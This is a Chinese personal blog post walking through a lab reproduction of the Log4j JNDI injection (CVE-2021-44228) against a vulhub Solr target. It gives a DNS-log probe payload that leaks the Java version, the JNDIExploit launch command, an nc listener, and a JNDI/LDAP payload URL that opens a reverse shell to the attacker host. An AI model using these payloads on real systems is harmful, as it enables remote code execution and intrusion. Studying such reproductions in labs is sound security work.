banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github

Log4J反序列化

环境:
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali 系统一个 —— 需 nc 来监听端口信息,作为攻击机
本机:中转机
centOS:靶机

地址信息:
靶机 IP:192.168.1.4:8983
本机 IP:192.168.1.2
攻击机:192.168.91.131

开启靶机环境
image.png
请求一个 DNS 域名
http://dnslog.cn/
image.png
域名:
gswq4u.dnslog.cn
打开 hackbar,先点一下 loadURL
image.png

将资料中提供的地址,复制
image.png
将后面的域名,改为刚刚申请的
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
点击执行,出现下面页面
image.png

这里获得了反馈
image.png
现在打开 JNDIExploit-1.2,
输入指令
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本机 IP
image.png
然后在攻击机,打开端口监听
命令:
nc -lvp 4444

在 hackbar 构建如下命令、
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
点击 Execute
image.png
发现监听的端口返回了 shell
image.png
到此复现完成

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.